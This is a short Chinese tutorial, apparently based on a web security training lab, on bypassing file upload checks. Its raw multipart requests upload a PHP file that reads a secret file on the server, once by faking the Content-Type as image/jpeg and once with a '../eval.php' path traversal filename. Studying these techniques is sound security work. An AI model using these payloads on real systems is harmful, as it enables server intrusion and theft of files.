文件上传利用的几种方法

　　当我们找到一个文件上传接口时，发现他的MIME类型检测为Content-Type: multipart/form-data;时，我们就可以尝试下面几种方法来绕过限制。

-----------------------------9366461823358637852847582934
Content-Disposition: form-data; name="avatar"; filename="eval.php"
Content-Type: image/jpeg

 <?php echo file_get_contents('/home/carlos/secret'); ?>
-----------------------------9366461823358637852847582934
Content-Disposition: form-data; name="user"

wiener
-----------------------------9366461823358637852847582934
Content-Disposition: form-data; name="csrf"

zbmggAivgbQgkABY84GKZalPOKgfd9oY
-----------------------------9366461823358637852847582934--

　　1. 修改 Content-Type: image/jpeg

-----------------------------9366461823358637852847582934
Content-Disposition: form-data; name="avatar"; filename="../eval.php"
Content-Type: image/jpeg

 <?php echo file_get_contents('/home/carlos/secret'); ?>
-----------------------------9366461823358637852847582934
Content-Disposition: form-data; name="user"

wiener
-----------------------------9366461823358637852847582934
Content-Disposition: form-data; name="csrf"

zbmggAivgbQgkABY84GKZalPOKgfd9oY
-----------------------------9366461823358637852847582934--

　　2. 修改 filename="../eval.php"  这样就可以将攻击者要上传的文件上传到上一级目录。

　　有可能在当前目录，配置了上传的文件没有执行权限，但是如果上传到其他目录，就有可能有执行权限。